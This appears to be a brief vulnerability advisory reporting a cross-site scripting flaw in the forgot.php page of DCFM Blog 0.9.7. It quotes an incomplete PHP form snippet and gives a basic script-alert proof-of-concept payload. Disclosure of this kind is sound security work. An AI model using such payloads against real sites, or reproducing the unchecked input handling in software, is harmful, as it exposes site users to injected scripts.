DCFM Blog 0.9.7 XSS Attack
===========================
Discovered by N_A , N_A[at]tutanota.com
========================================
Description
============
Open-source blog project. Free blog system for any website. Uses MySQL and PHP 5. Very easily customizable and incredibly flexible.
https://sourceforge.net/projects/dcfm-blog/
Vulnerability
=============
The forgot.php file in DCFM Blog 0.9.7 does not proplery check input and code injection is possible.
if (!isset($_POST['userf'])) {
echo "<form action='forgot.php' method='post'>
Please provide your username:
<input type='text' name='userf' />
<br /><br /><input type='submit' value='Get my Password' />
</form>";
Proof Of Concept String
========================
<script>alert('XSS');</script>
Email
=====
N_A[at]tutanota.com